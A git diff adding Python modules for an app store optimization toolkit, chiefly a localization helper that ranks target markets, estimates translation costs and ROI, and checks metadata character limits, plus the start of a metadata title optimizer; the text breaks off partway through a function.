|
||||||
|
if current_month in [11, 12]:
|
||||||
|
opportunities.append({
|
||||||
|
'event': 'Holiday Shopping Season',
|
||||||
|
'dates': 'November-December',
|
||||||
|
'relevance': 'high' if app_category.lower() in ['shopping', 'gifts'] else 'low'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Category-specific
|
||||||
|
if app_category.lower() == 'education' and current_month in [8, 9]:
|
||||||
|
opportunities.append({
|
||||||
|
'event': 'Back to School',
|
||||||
|
'dates': 'August-September',
|
||||||
|
'relevance': 'high'
|
||||||
|
})
|
||||||
|
|
||||||
|
return opportunities
|
||||||
|
|
||||||
|
def _generate_seasonal_campaign(self, opportunity: Dict[str, Any]) -> Dict[str, Any]:
|
||||||
|
"""Generate campaign idea for seasonal opportunity."""
|
||||||
|
return {
|
||||||
|
'event': opportunity['event'],
|
||||||
|
'campaign_idea': f"Create themed visuals and messaging for {opportunity['event']}",
|
||||||
|
'metadata_updates': 'Update app description and screenshots with seasonal themes',
|
||||||
|
'promotion_strategy': 'Consider limited-time features or discounts'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _create_seasonal_timeline(self, campaigns: List[Dict[str, Any]]) -> List[str]:
|
||||||
|
"""Create implementation timeline for campaigns."""
|
||||||
|
return [
|
||||||
|
f"30 days before: Plan {campaign['event']} campaign strategy"
|
||||||
|
for campaign in campaigns
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
def generate_launch_checklist(
|
||||||
|
platform: str,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
launch_date: Optional[str] = None
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to generate launch checklist.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
platform: Platform ('apple', 'google', or 'both')
|
||||||
|
app_info: App information
|
||||||
|
launch_date: Target launch date
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete launch checklist
|
||||||
|
"""
|
||||||
|
generator = LaunchChecklistGenerator(platform)
|
||||||
|
return generator.generate_prelaunch_checklist(app_info, launch_date)
|
||||||
588
skills/app-store-optimization/localization_helper.py
Normal file
588
skills/app-store-optimization/localization_helper.py
Normal file
@@ -0,0 +1,588 @@
|
|||||||
|
"""
|
||||||
|
Localization helper module for App Store Optimization.
|
||||||
|
Manages multi-language ASO optimization strategies.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
|
||||||
|
|
||||||
|
class LocalizationHelper:
|
||||||
|
"""Helps manage multi-language ASO optimization."""
|
||||||
|
|
||||||
|
# Priority markets by language (based on app store revenue and user base)
|
||||||
|
PRIORITY_MARKETS = {
|
||||||
|
'tier_1': [
|
||||||
|
{'language': 'en-US', 'market': 'United States', 'revenue_share': 0.25},
|
||||||
|
{'language': 'zh-CN', 'market': 'China', 'revenue_share': 0.20},
|
||||||
|
{'language': 'ja-JP', 'market': 'Japan', 'revenue_share': 0.10},
|
||||||
|
{'language': 'de-DE', 'market': 'Germany', 'revenue_share': 0.08},
|
||||||
|
{'language': 'en-GB', 'market': 'United Kingdom', 'revenue_share': 0.06}
|
||||||
|
],
|
||||||
|
'tier_2': [
|
||||||
|
{'language': 'fr-FR', 'market': 'France', 'revenue_share': 0.05},
|
||||||
|
{'language': 'ko-KR', 'market': 'South Korea', 'revenue_share': 0.05},
|
||||||
|
{'language': 'es-ES', 'market': 'Spain', 'revenue_share': 0.03},
|
||||||
|
{'language': 'it-IT', 'market': 'Italy', 'revenue_share': 0.03},
|
||||||
|
{'language': 'pt-BR', 'market': 'Brazil', 'revenue_share': 0.03}
|
||||||
|
],
|
||||||
|
'tier_3': [
|
||||||
|
{'language': 'ru-RU', 'market': 'Russia', 'revenue_share': 0.02},
|
||||||
|
{'language': 'es-MX', 'market': 'Mexico', 'revenue_share': 0.02},
|
||||||
|
{'language': 'nl-NL', 'market': 'Netherlands', 'revenue_share': 0.02},
|
||||||
|
{'language': 'sv-SE', 'market': 'Sweden', 'revenue_share': 0.01},
|
||||||
|
{'language': 'pl-PL', 'market': 'Poland', 'revenue_share': 0.01}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
|
||||||
|
# Character limit multipliers by language (some languages need more/less space)
|
||||||
|
CHAR_MULTIPLIERS = {
|
||||||
|
'en': 1.0,
|
||||||
|
'zh': 0.6, # Chinese characters are more compact
|
||||||
|
'ja': 0.7, # Japanese uses kanji
|
||||||
|
'ko': 0.8, # Korean is relatively compact
|
||||||
|
'de': 1.3, # German words are typically longer
|
||||||
|
'fr': 1.2, # French tends to be longer
|
||||||
|
'es': 1.1, # Spanish slightly longer
|
||||||
|
'pt': 1.1, # Portuguese similar to Spanish
|
||||||
|
'ru': 1.1, # Russian similar length
|
||||||
|
'ar': 1.0, # Arabic varies
|
||||||
|
'it': 1.1 # Italian similar to Spanish
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self, app_category: str = 'general'):
|
||||||
|
"""
|
||||||
|
Initialize localization helper.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_category: App category to prioritize relevant markets
|
||||||
|
"""
|
||||||
|
self.app_category = app_category
|
||||||
|
self.localization_plans = []
|
||||||
|
|
||||||
|
def identify_target_markets(
|
||||||
|
self,
|
||||||
|
current_market: str = 'en-US',
|
||||||
|
budget_level: str = 'medium',
|
||||||
|
target_market_count: int = 5
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Recommend priority markets for localization.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
current_market: Current/primary market
|
||||||
|
budget_level: 'low', 'medium', or 'high'
|
||||||
|
target_market_count: Number of markets to target
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Prioritized market recommendations
|
||||||
|
"""
|
||||||
|
# Determine tier priorities based on budget
|
||||||
|
if budget_level == 'low':
|
||||||
|
priority_tiers = ['tier_1']
|
||||||
|
max_markets = min(target_market_count, 3)
|
||||||
|
elif budget_level == 'medium':
|
||||||
|
priority_tiers = ['tier_1', 'tier_2']
|
||||||
|
max_markets = min(target_market_count, 8)
|
||||||
|
else: # high budget
|
||||||
|
priority_tiers = ['tier_1', 'tier_2', 'tier_3']
|
||||||
|
max_markets = target_market_count
|
||||||
|
|
||||||
|
# Collect markets from priority tiers
|
||||||
|
recommended_markets = []
|
||||||
|
for tier in priority_tiers:
|
||||||
|
for market in self.PRIORITY_MARKETS[tier]:
|
||||||
|
if market['language'] != current_market:
|
||||||
|
recommended_markets.append({
|
||||||
|
**market,
|
||||||
|
'tier': tier,
|
||||||
|
'estimated_translation_cost': self._estimate_translation_cost(
|
||||||
|
market['language']
|
||||||
|
)
|
||||||
|
})
|
||||||
|
|
||||||
|
# Sort by revenue share and limit
|
||||||
|
recommended_markets.sort(key=lambda x: x['revenue_share'], reverse=True)
|
||||||
|
recommended_markets = recommended_markets[:max_markets]
|
||||||
|
|
||||||
|
# Calculate potential ROI
|
||||||
|
total_potential_revenue_share = sum(m['revenue_share'] for m in recommended_markets)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'recommended_markets': recommended_markets,
|
||||||
|
'total_markets': len(recommended_markets),
|
||||||
|
'estimated_total_revenue_lift': f"{total_potential_revenue_share*100:.1f}%",
|
||||||
|
'estimated_cost': self._estimate_total_localization_cost(recommended_markets),
|
||||||
|
'implementation_priority': self._prioritize_implementation(recommended_markets)
|
||||||
|
}
|
||||||
|
|
||||||
|
def translate_metadata(
|
||||||
|
self,
|
||||||
|
source_metadata: Dict[str, str],
|
||||||
|
source_language: str,
|
||||||
|
target_language: str,
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Generate localized metadata with character limit considerations.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
source_metadata: Original metadata (title, description, etc.)
|
||||||
|
source_language: Source language code (e.g., 'en')
|
||||||
|
target_language: Target language code (e.g., 'es')
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Localized metadata with character limit validation
|
||||||
|
"""
|
||||||
|
# Get character multiplier
|
||||||
|
target_lang_code = target_language.split('-')[0]
|
||||||
|
char_multiplier = self.CHAR_MULTIPLIERS.get(target_lang_code, 1.0)
|
||||||
|
|
||||||
|
# Platform-specific limits
|
||||||
|
if platform == 'apple':
|
||||||
|
limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
|
||||||
|
else:
|
||||||
|
limits = {'title': 50, 'short_description': 80, 'description': 4000}
|
||||||
|
|
||||||
|
localized_metadata = {}
|
||||||
|
warnings = []
|
||||||
|
|
||||||
|
for field, text in source_metadata.items():
|
||||||
|
if field not in limits:
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Estimate target length
|
||||||
|
estimated_length = int(len(text) * char_multiplier)
|
||||||
|
limit = limits[field]
|
||||||
|
|
||||||
|
localized_metadata[field] = {
|
||||||
|
'original_text': text,
|
||||||
|
'original_length': len(text),
|
||||||
|
'estimated_target_length': estimated_length,
|
||||||
|
'character_limit': limit,
|
||||||
|
'fits_within_limit': estimated_length <= limit,
|
||||||
|
'translation_notes': self._get_translation_notes(
|
||||||
|
field,
|
||||||
|
target_language,
|
||||||
|
estimated_length,
|
||||||
|
limit
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
if estimated_length > limit:
|
||||||
|
warnings.append(
|
||||||
|
f"{field}: Estimated length ({estimated_length}) may exceed limit ({limit}) - "
|
||||||
|
f"condensing may be required"
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'source_language': source_language,
|
||||||
|
'target_language': target_language,
|
||||||
|
'platform': platform,
|
||||||
|
'localized_fields': localized_metadata,
|
||||||
|
'character_multiplier': char_multiplier,
|
||||||
|
'warnings': warnings,
|
||||||
|
'recommendations': self._generate_translation_recommendations(
|
||||||
|
target_language,
|
||||||
|
warnings
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def adapt_keywords(
|
||||||
|
self,
|
||||||
|
source_keywords: List[str],
|
||||||
|
source_language: str,
|
||||||
|
target_language: str,
|
||||||
|
target_market: str
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Adapt keywords for target market (not just direct translation).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
source_keywords: Original keywords
|
||||||
|
source_language: Source language code
|
||||||
|
target_language: Target language code
|
||||||
|
target_market: Target market (e.g., 'France', 'Japan')
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Adapted keyword recommendations
|
||||||
|
"""
|
||||||
|
# Cultural adaptation considerations
|
||||||
|
cultural_notes = self._get_cultural_keyword_considerations(target_market)
|
||||||
|
|
||||||
|
# Search behavior differences
|
||||||
|
search_patterns = self._get_search_patterns(target_market)
|
||||||
|
|
||||||
|
adapted_keywords = []
|
||||||
|
for keyword in source_keywords:
|
||||||
|
adapted_keywords.append({
|
||||||
|
'source_keyword': keyword,
|
||||||
|
'adaptation_strategy': self._determine_adaptation_strategy(
|
||||||
|
keyword,
|
||||||
|
target_market
|
||||||
|
),
|
||||||
|
'cultural_considerations': cultural_notes.get(keyword, []),
|
||||||
|
'priority': 'high' if keyword in source_keywords[:3] else 'medium'
|
||||||
|
})
|
||||||
|
|
||||||
|
return {
|
||||||
|
'source_language': source_language,
|
||||||
|
'target_language': target_language,
|
||||||
|
'target_market': target_market,
|
||||||
|
'adapted_keywords': adapted_keywords,
|
||||||
|
'search_behavior_notes': search_patterns,
|
||||||
|
'recommendations': [
|
||||||
|
'Use native speakers for keyword research',
|
||||||
|
'Test keywords with local users before finalizing',
|
||||||
|
'Consider local competitors\' keyword strategies',
|
||||||
|
'Monitor search trends in target market'
|
||||||
|
]
|
||||||
|
}
|
||||||
|
|
||||||
|
def validate_translations(
|
||||||
|
self,
|
||||||
|
translated_metadata: Dict[str, str],
|
||||||
|
target_language: str,
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Validate translated metadata for character limits and quality.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
translated_metadata: Translated text fields
|
||||||
|
target_language: Target language code
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Validation report
|
||||||
|
"""
|
||||||
|
# Platform limits
|
||||||
|
if platform == 'apple':
|
||||||
|
limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
|
||||||
|
else:
|
||||||
|
limits = {'title': 50, 'short_description': 80, 'description': 4000}
|
||||||
|
|
||||||
|
validation_results = {
|
||||||
|
'is_valid': True,
|
||||||
|
'field_validations': {},
|
||||||
|
'errors': [],
|
||||||
|
'warnings': []
|
||||||
|
}
|
||||||
|
|
||||||
|
for field, text in translated_metadata.items():
|
||||||
|
if field not in limits:
|
||||||
|
continue
|
||||||
|
|
||||||
|
actual_length = len(text)
|
||||||
|
limit = limits[field]
|
||||||
|
is_within_limit = actual_length <= limit
|
||||||
|
|
||||||
|
validation_results['field_validations'][field] = {
|
||||||
|
'text': text,
|
||||||
|
'length': actual_length,
|
||||||
|
'limit': limit,
|
||||||
|
'is_valid': is_within_limit,
|
||||||
|
'usage_percentage': round((actual_length / limit) * 100, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
if not is_within_limit:
|
||||||
|
validation_results['is_valid'] = False
|
||||||
|
validation_results['errors'].append(
|
||||||
|
f"{field} exceeds limit: {actual_length}/{limit} characters"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Quality checks
|
||||||
|
quality_issues = self._check_translation_quality(
|
||||||
|
translated_metadata,
|
||||||
|
target_language
|
||||||
|
)
|
||||||
|
|
||||||
|
validation_results['quality_checks'] = quality_issues
|
||||||
|
|
||||||
|
if quality_issues:
|
||||||
|
validation_results['warnings'].extend(
|
||||||
|
[f"Quality issue: {issue}" for issue in quality_issues]
|
||||||
|
)
|
||||||
|
|
||||||
|
return validation_results
|
||||||
|
|
||||||
|
def calculate_localization_roi(
|
||||||
|
self,
|
||||||
|
target_markets: List[str],
|
||||||
|
current_monthly_downloads: int,
|
||||||
|
localization_cost: float,
|
||||||
|
expected_lift_percentage: float = 0.15
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Estimate ROI of localization investment.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target_markets: List of market codes
|
||||||
|
current_monthly_downloads: Current monthly downloads
|
||||||
|
localization_cost: Total cost to localize
|
||||||
|
expected_lift_percentage: Expected download increase (default 15%)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
ROI analysis
|
||||||
|
"""
|
||||||
|
# Estimate market-specific lift
|
||||||
|
market_data = []
|
||||||
|
total_expected_lift = 0
|
||||||
|
|
||||||
|
for market_code in target_markets:
|
||||||
|
# Find market in priority lists
|
||||||
|
market_info = None
|
||||||
|
for tier_name, markets in self.PRIORITY_MARKETS.items():
|
||||||
|
for m in markets:
|
||||||
|
if m['language'] == market_code:
|
||||||
|
market_info = m
|
||||||
|
break
|
||||||
|
|
||||||
|
if not market_info:
|
||||||
|
continue
|
||||||
|
|
||||||
|
# Estimate downloads from this market
|
||||||
|
market_downloads = int(current_monthly_downloads * market_info['revenue_share'])
|
||||||
|
expected_increase = int(market_downloads * expected_lift_percentage)
|
||||||
|
total_expected_lift += expected_increase
|
||||||
|
|
||||||
|
market_data.append({
|
||||||
|
'market': market_info['market'],
|
||||||
|
'current_monthly_downloads': market_downloads,
|
||||||
|
'expected_increase': expected_increase,
|
||||||
|
'revenue_potential': market_info['revenue_share']
|
||||||
|
})
|
||||||
|
|
||||||
|
# Calculate payback period (assuming $2 revenue per download)
|
||||||
|
revenue_per_download = 2.0
|
||||||
|
monthly_additional_revenue = total_expected_lift * revenue_per_download
|
||||||
|
payback_months = (localization_cost / monthly_additional_revenue) if monthly_additional_revenue > 0 else float('inf')
|
||||||
|
|
||||||
|
return {
|
||||||
|
'markets_analyzed': len(market_data),
|
||||||
|
'market_breakdown': market_data,
|
||||||
|
'total_expected_monthly_lift': total_expected_lift,
|
||||||
|
'expected_monthly_revenue_increase': f"${monthly_additional_revenue:,.2f}",
|
||||||
|
'localization_cost': f"${localization_cost:,.2f}",
|
||||||
|
'payback_period_months': round(payback_months, 1) if payback_months != float('inf') else 'N/A',
|
||||||
|
'annual_roi': f"{((monthly_additional_revenue * 12 - localization_cost) / localization_cost * 100):.1f}%" if payback_months != float('inf') else 'Negative',
|
||||||
|
'recommendation': self._generate_roi_recommendation(payback_months)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _estimate_translation_cost(self, language: str) -> Dict[str, float]:
|
||||||
|
"""Estimate translation cost for a language."""
|
||||||
|
# Base cost per word (professional translation)
|
||||||
|
base_cost_per_word = 0.12
|
||||||
|
|
||||||
|
# Language-specific multipliers
|
||||||
|
multipliers = {
|
||||||
|
'zh-CN': 1.5, # Chinese requires specialist
|
||||||
|
'ja-JP': 1.5, # Japanese requires specialist
|
||||||
|
'ko-KR': 1.3,
|
||||||
|
'ar-SA': 1.4, # Arabic (right-to-left)
|
||||||
|
'default': 1.0
|
||||||
|
}
|
||||||
|
|
||||||
|
multiplier = multipliers.get(language, multipliers['default'])
|
||||||
|
|
||||||
|
# Typical word counts for app store metadata
|
||||||
|
typical_word_counts = {
|
||||||
|
'title': 5,
|
||||||
|
'subtitle': 5,
|
||||||
|
'description': 300,
|
||||||
|
'keywords': 20,
|
||||||
|
'screenshots': 50 # Caption text
|
||||||
|
}
|
||||||
|
|
||||||
|
total_words = sum(typical_word_counts.values())
|
||||||
|
estimated_cost = total_words * base_cost_per_word * multiplier
|
||||||
|
|
||||||
|
return {
|
||||||
|
'cost_per_word': base_cost_per_word * multiplier,
|
||||||
|
'total_words': total_words,
|
||||||
|
'estimated_cost': round(estimated_cost, 2)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _estimate_total_localization_cost(self, markets: List[Dict[str, Any]]) -> str:
|
||||||
|
"""Estimate total cost for multiple markets."""
|
||||||
|
total = sum(m['estimated_translation_cost']['estimated_cost'] for m in markets)
|
||||||
|
return f"${total:,.2f}"
|
||||||
|
|
||||||
|
def _prioritize_implementation(self, markets: List[Dict[str, Any]]) -> List[Dict[str, str]]:
|
||||||
|
"""Create phased implementation plan."""
|
||||||
|
phases = []
|
||||||
|
|
||||||
|
# Phase 1: Top revenue markets
|
||||||
|
phase_1 = [m for m in markets[:3]]
|
||||||
|
if phase_1:
|
||||||
|
phases.append({
|
||||||
|
'phase': 'Phase 1 (First 30 days)',
|
||||||
|
'markets': ', '.join([m['market'] for m in phase_1]),
|
||||||
|
'rationale': 'Highest revenue potential markets'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Phase 2: Remaining tier 1 and top tier 2
|
||||||
|
phase_2 = [m for m in markets[3:6]]
|
||||||
|
if phase_2:
|
||||||
|
phases.append({
|
||||||
|
'phase': 'Phase 2 (Days 31-60)',
|
||||||
|
'markets': ', '.join([m['market'] for m in phase_2]),
|
||||||
|
'rationale': 'Strong revenue markets with good ROI'
|
||||||
|
})
|
||||||
|
|
||||||
|
# Phase 3: Remaining markets
|
||||||
|
phase_3 = [m for m in markets[6:]]
|
||||||
|
if phase_3:
|
||||||
|
phases.append({
|
||||||
|
'phase': 'Phase 3 (Days 61-90)',
|
||||||
|
'markets': ', '.join([m['market'] for m in phase_3]),
|
||||||
|
'rationale': 'Complete global coverage'
|
||||||
|
})
|
||||||
|
|
||||||
|
return phases
|
||||||
|
|
||||||
|
def _get_translation_notes(
|
||||||
|
self,
|
||||||
|
field: str,
|
||||||
|
target_language: str,
|
||||||
|
estimated_length: int,
|
||||||
|
limit: int
|
||||||
|
) -> List[str]:
|
||||||
|
"""Get translation-specific notes for field."""
|
||||||
|
notes = []
|
||||||
|
|
||||||
|
if estimated_length > limit:
|
||||||
|
notes.append(f"Condensing required - aim for {limit - 10} characters to allow buffer")
|
||||||
|
|
||||||
|
if field == 'title' and target_language.startswith('zh'):
|
||||||
|
notes.append("Chinese characters convey more meaning - may need fewer characters")
|
||||||
|
|
||||||
|
if field == 'keywords' and target_language.startswith('de'):
|
||||||
|
notes.append("German compound words may be longer - prioritize shorter keywords")
|
||||||
|
|
||||||
|
return notes
|
||||||
|
|
||||||
|
def _generate_translation_recommendations(
|
||||||
|
self,
|
||||||
|
target_language: str,
|
||||||
|
warnings: List[str]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate translation recommendations."""
|
||||||
|
recommendations = [
|
||||||
|
"Use professional native speakers for translation",
|
||||||
|
"Test translations with local users before finalizing"
|
||||||
|
]
|
||||||
|
|
||||||
|
if warnings:
|
||||||
|
recommendations.append("Work with translator to condense text while preserving meaning")
|
||||||
|
|
||||||
|
if target_language.startswith('zh') or target_language.startswith('ja'):
|
||||||
|
recommendations.append("Consider cultural context and local idioms")
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _get_cultural_keyword_considerations(self, target_market: str) -> Dict[str, List[str]]:
|
||||||
|
"""Get cultural considerations for keywords by market."""
|
||||||
|
# Simplified example - real implementation would be more comprehensive
|
||||||
|
considerations = {
|
||||||
|
'China': ['Avoid politically sensitive terms', 'Consider local alternatives to blocked services'],
|
||||||
|
'Japan': ['Honorific language important', 'Technical terms often use katakana'],
|
||||||
|
'Germany': ['Privacy and security terms resonate', 'Efficiency and quality valued'],
|
||||||
|
'France': ['French language protection laws', 'Prefer French terms over English'],
|
||||||
|
'default': ['Research local search behavior', 'Test with native speakers']
|
||||||
|
}
|
||||||
|
|
||||||
|
return considerations.get(target_market, considerations['default'])
|
||||||
|
|
||||||
|
def _get_search_patterns(self, target_market: str) -> List[str]:
|
||||||
|
"""Get search pattern notes for market."""
|
||||||
|
patterns = {
|
||||||
|
'China': ['Use both simplified characters and romanization', 'Brand names often romanized'],
|
||||||
|
'Japan': ['Mix of kanji, hiragana, and katakana', 'English words common in tech'],
|
||||||
|
'Germany': ['Compound words common', 'Specific technical terminology'],
|
||||||
|
'default': ['Research local search trends', 'Monitor competitor keywords']
|
||||||
|
}
|
||||||
|
|
||||||
|
return patterns.get(target_market, patterns['default'])
|
||||||
|
|
||||||
|
def _determine_adaptation_strategy(self, keyword: str, target_market: str) -> str:
|
||||||
|
"""Determine how to adapt keyword for market."""
|
||||||
|
# Simplified logic
|
||||||
|
if target_market in ['China', 'Japan', 'Korea']:
|
||||||
|
return 'full_localization' # Complete translation needed
|
||||||
|
elif target_market in ['Germany', 'France', 'Spain']:
|
||||||
|
return 'adapt_and_translate' # Some adaptation needed
|
||||||
|
else:
|
||||||
|
return 'direct_translation' # Direct translation usually sufficient
|
||||||
|
|
||||||
|
def _check_translation_quality(
|
||||||
|
self,
|
||||||
|
translated_metadata: Dict[str, str],
|
||||||
|
target_language: str
|
||||||
|
) -> List[str]:
|
||||||
|
"""Basic quality checks for translations."""
|
||||||
|
issues = []
|
||||||
|
|
||||||
|
# Check for untranslated placeholders
|
||||||
|
for field, text in translated_metadata.items():
|
||||||
|
if '[' in text or '{' in text or 'TODO' in text.upper():
|
||||||
|
issues.append(f"{field} contains placeholder text")
|
||||||
|
|
||||||
|
# Check for excessive punctuation
|
||||||
|
for field, text in translated_metadata.items():
|
||||||
|
if text.count('!') > 3:
|
||||||
|
issues.append(f"{field} has excessive exclamation marks")
|
||||||
|
|
||||||
|
return issues
|
||||||
|
|
||||||
|
def _generate_roi_recommendation(self, payback_months: float) -> str:
|
||||||
|
"""Generate ROI recommendation."""
|
||||||
|
if payback_months <= 3:
|
||||||
|
return "Excellent ROI - proceed immediately"
|
||||||
|
elif payback_months <= 6:
|
||||||
|
return "Good ROI - recommended investment"
|
||||||
|
elif payback_months <= 12:
|
||||||
|
return "Moderate ROI - consider if strategic market"
|
||||||
|
else:
|
||||||
|
return "Low ROI - reconsider or focus on higher-priority markets first"
|
||||||
|
|
||||||
|
|
||||||
|
def plan_localization_strategy(
|
||||||
|
current_market: str,
|
||||||
|
budget_level: str,
|
||||||
|
monthly_downloads: int
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to plan localization strategy.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
current_market: Current market code
|
||||||
|
budget_level: Budget level
|
||||||
|
monthly_downloads: Current monthly downloads
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete localization plan
|
||||||
|
"""
|
||||||
|
helper = LocalizationHelper()
|
||||||
|
|
||||||
|
target_markets = helper.identify_target_markets(
|
||||||
|
current_market=current_market,
|
||||||
|
budget_level=budget_level
|
||||||
|
)
|
||||||
|
|
||||||
|
# Extract market codes
|
||||||
|
market_codes = [m['language'] for m in target_markets['recommended_markets']]
|
||||||
|
|
||||||
|
# Calculate ROI
|
||||||
|
estimated_cost = float(target_markets['estimated_cost'].replace('$', '').replace(',', ''))
|
||||||
|
|
||||||
|
roi_analysis = helper.calculate_localization_roi(
|
||||||
|
market_codes,
|
||||||
|
monthly_downloads,
|
||||||
|
estimated_cost
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'target_markets': target_markets,
|
||||||
|
'roi_analysis': roi_analysis
|
||||||
|
}
|
||||||
581
skills/app-store-optimization/metadata_optimizer.py
Normal file
581
skills/app-store-optimization/metadata_optimizer.py
Normal file
@@ -0,0 +1,581 @@
|
|||||||
|
"""
|
||||||
|
Metadata optimization module for App Store Optimization.
|
||||||
|
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
class MetadataOptimizer:
|
||||||
|
"""Optimizes app store metadata for maximum discoverability and conversion."""
|
||||||
|
|
||||||
|
# Platform-specific character limits
|
||||||
|
CHAR_LIMITS = {
|
||||||
|
'apple': {
|
||||||
|
'title': 30,
|
||||||
|
'subtitle': 30,
|
||||||
|
'promotional_text': 170,
|
||||||
|
'description': 4000,
|
||||||
|
'keywords': 100,
|
||||||
|
'whats_new': 4000
|
||||||
|
},
|
||||||
|
'google': {
|
||||||
|
'title': 50,
|
||||||
|
'short_description': 80,
|
||||||
|
'full_description': 4000
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self, platform: str = 'apple'):
|
||||||
|
"""
|
||||||
|
Initialize metadata optimizer.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
"""
|
||||||
|
if platform not in ['apple', 'google']:
|
||||||
|
raise ValueError("Platform must be 'apple' or 'google'")
|
||||||
|
|
||||||
|
self.platform = platform
|
||||||
|
self.limits = self.CHAR_LIMITS[platform]
|
||||||
|
|
||||||
|
def optimize_title(
|
||||||
|
self,
|
||||||
|
app_name: str,
|
||||||
|
target_keywords: List[str],
|
||||||
|
include_brand: bool = True
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Optimize app title with keyword integration.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_name: Your app's brand name
|
||||||
|
target_keywords: List of keywords to potentially include
|
||||||
|
include_brand: Whether to include brand name
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Optimized title options with analysis
|
||||||
|
"""
|
||||||
|
max_length = self.limits['title']
|
||||||
|
|
||||||
|
title_options = []
|
||||||
|
|
||||||
|
# Option 1: Brand name only
|
||||||
|
if include_brand:
|
||||||
|
option1 = app_name[:max_length]
|
||||||
|
title_options.append({
|
||||||
|
'title': option1,
|
||||||
|
'length': len(option1),
|
||||||
|
'remaining_chars': max_length - len(option1),
|
||||||
|
'keywords_included': [],
|
||||||
|
'strategy': 'brand_only',
|
||||||
|
'pros': ['Maximum brand recognition', 'Clean and simple'],
|
||||||
|
'cons': ['No keyword targeting', 'Lower discoverability']
|
||||||
|
})
|
||||||
|
|
||||||
|
# Option 2: Brand + Primary Keyword
|
||||||
|
if target_keywords:
|
||||||
|
primary_keyword = target_keywords[0]
|
||||||
|
option2 = self._build_title_with_keywords(
|
||||||
|
app_name,
|
||||||
|
[primary_keyword],
|
||||||
|
max_length
|
||||||
|
)
|
||||||
|
if option2:
|
||||||
|
title_options.append({
|
||||||
|
'title': option2,
|
||||||
|
'length': len(option2),
|
||||||
|
'remaining_chars': max_length - len(option2),
|
||||||
|
'keywords_included': [primary_keyword],
|
||||||
|
'strategy': 'brand_plus_primary',
|
||||||
|
'pros': ['Targets main keyword', 'Maintains brand identity'],
|
||||||
|
'cons': ['Limited keyword coverage']
|
||||||
|
})
|
||||||
|
|
||||||
|
# Option 3: Brand + Multiple Keywords (if space allows)
|
||||||
|
if len(target_keywords) > 1:
|
||||||
|
option3 = self._build_title_with_keywords(
|
||||||
|
app_name,
|
||||||
|
target_keywords[:2],
|
||||||
|
max_length
|
||||||
|
)
|
||||||
|
if option3:
|
||||||
|
title_options.append({
|
||||||
|
'title': option3,
|
||||||
|
'length': len(option3),
|
||||||
|
'remaining_chars': max_length - len(option3),
|
||||||
|
'keywords_included': target_keywords[:2],
|
||||||
|
'strategy': 'brand_plus_multiple',
|
||||||
|
'pros': ['Multiple keyword targets', 'Better discoverability'],
|
||||||
|
'cons': ['May feel cluttered', 'Less brand focus']
|
||||||
|
})
|
||||||
|
|
||||||
|
# Option 4: Keyword-first approach (for new apps)
|
||||||
|
if target_keywords and not include_brand:
|
||||||
|
option4 = " ".join(target_keywords[:2])[:max_length]
|
||||||
|
title_options.append({
|
||||||
|
'title': option4,
|
||||||
|
'length': len(option4),
|
||||||
|
'remaining_chars': max_length - len(option4),
|
||||||
|
'keywords_included': target_keywords[:2],
|
||||||
|
'strategy': 'keyword_first',
|
||||||
|
